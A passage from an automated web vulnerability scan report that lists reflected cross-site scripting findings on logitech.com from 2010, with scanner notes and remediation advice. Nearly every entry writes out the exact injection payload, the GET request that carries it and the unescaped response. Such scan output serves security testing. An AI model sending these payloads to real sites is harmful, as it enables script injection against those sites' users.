Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/1039

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13909"><script>alert(1)</script>8a551f0facc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/103913909"><script>alert(1)</script>8a551f0facc HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="103913909"><script>alert(1)</script>8a551f0facc">
...[SNIP]...

1.173. http://www.logitech.com/en-us/1039 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/1039

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e388f</script><script>alert(1)</script>2873378b32d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/1039e388f</script><script>alert(1)</script>2873378b32d HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','1039e388f</script><script>alert(1)</script>2873378b32d' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.174. http://www.logitech.com/en-us/265/6687 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5285"%3bac7931b086f was submitted in the REST URL parameter 1. This input was echoed as f5285";ac7931b086f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-usf5285"%3bac7931b086f/265/6687 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-usf5285";ac7931b086f/265/6687";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.175. http://www.logitech.com/en-us/265/6687 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c03e5"><script>alert(1)</script>389fde72b39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-usc03e5"><script>alert(1)</script>389fde72b39/265/6687 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-usc03e5"><script>alert(1)</script>389fde72b39/265/6687">
...[SNIP]...

1.176. http://www.logitech.com/en-us/265/6687 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 385bf</script><script>alert(1)</script>b74a008f78e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /385bf</script><script>alert(1)</script>b74a008f78e/265/6687 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','385bf</script><script>alert(1)</script>b74a008f78e/265/6687' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.177. http://www.logitech.com/en-us/265/6687 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55b7"><script>alert(1)</script>93fd2d266e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/265b55b7"><script>alert(1)</script>93fd2d266e/6687 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="265b55b7"><script>alert(1)</script>93fd2d266e/6687">
...[SNIP]...

1.178. http://www.logitech.com/en-us/265/6687 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5770a</script><script>alert(1)</script>b80bf584b5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/2655770a</script><script>alert(1)</script>b80bf584b5a/6687 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','2655770a</script><script>alert(1)</script>b80bf584b5a/6687' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.179. http://www.logitech.com/en-us/265/6687 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 710e4"><script>alert(1)</script>ca1f2a5e2f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/265/6687710e4"><script>alert(1)</script>ca1f2a5e2f4 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="265/6687710e4"><script>alert(1)</script>ca1f2a5e2f4">
...[SNIP]...

1.180. http://www.logitech.com/en-us/265/6687 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/265/6687

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86485</script><script>alert(1)</script>c38881d4550 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/265/668786485</script><script>alert(1)</script>c38881d4550 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','265/668786485</script><script>alert(1)</script>c38881d4550' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.181. http://www.logitech.com/en-us/349/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61873"><script>alert(1)</script>23da25f57a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-us61873"><script>alert(1)</script>23da25f57a2/349/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us61873"><script>alert(1)</script>23da25f57a2/349">
...[SNIP]...

1.182. http://www.logitech.com/en-us/349/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa93f</script><script>alert(1)</script>252076e8926 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aa93f</script><script>alert(1)</script>252076e8926/349/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','aa93f</script><script>alert(1)</script>252076e8926/349' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dc
...[SNIP]...

1.183. http://www.logitech.com/en-us/349/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/349/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec3a2"%3bc56b2682970 was submitted in the REST URL parameter 1. This input was echoed as ec3a2";c56b2682970 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-usec3a2"%3bc56b2682970/349/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Apache
AK-control: no-store
Date: Fri, 12 Nov 2010 13:01:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-usec3a2";c56b2682970/349";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.184. http://www.logitech.com/en-us/349/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f30d"><script>alert(1)</script>b45076af784 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-us/3497f30d"><script>alert(1)</script>b45076af784/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="3497f30d"><script>alert(1)</script>b45076af784">
...[SNIP]...

1.185. http://www.logitech.com/en-us/349/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a24a</script><script>alert(1)</script>f85fa4b58f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/3498a24a</script><script>alert(1)</script>f85fa4b58f7/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','3498a24a</script><script>alert(1)</script>f85fa4b58f7' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.186. http://www.logitech.com/en-us/349/6072 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8518e</script><script>alert(1)</script>1319af95ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8518e</script><script>alert(1)</script>1319af95ca/349/6072 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','8518e</script><script>alert(1)</script>1319af95ca/349/6072' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.187. http://www.logitech.com/en-us/349/6072 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd6c8"><script>alert(1)</script>50c8da53e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-usfd6c8"><script>alert(1)</script>50c8da53e7/349/6072 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-usfd6c8"><script>alert(1)</script>50c8da53e7/349/6072">
...[SNIP]...

1.188. http://www.logitech.com/en-us/349/6072 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da40a"%3bf0266a417b6 was submitted in the REST URL parameter 1. This input was echoed as da40a";f0266a417b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-usda40a"%3bf0266a417b6/349/6072 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-usda40a";f0266a417b6/349/6072";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.189. http://www.logitech.com/en-us/349/6072 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39fb2"><script>alert(1)</script>423a22fa55a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/34939fb2"><script>alert(1)</script>423a22fa55a/6072 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="34939fb2"><script>alert(1)</script>423a22fa55a/6072">
...[SNIP]...

1.190. http://www.logitech.com/en-us/349/6072 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/6072

Issue detail

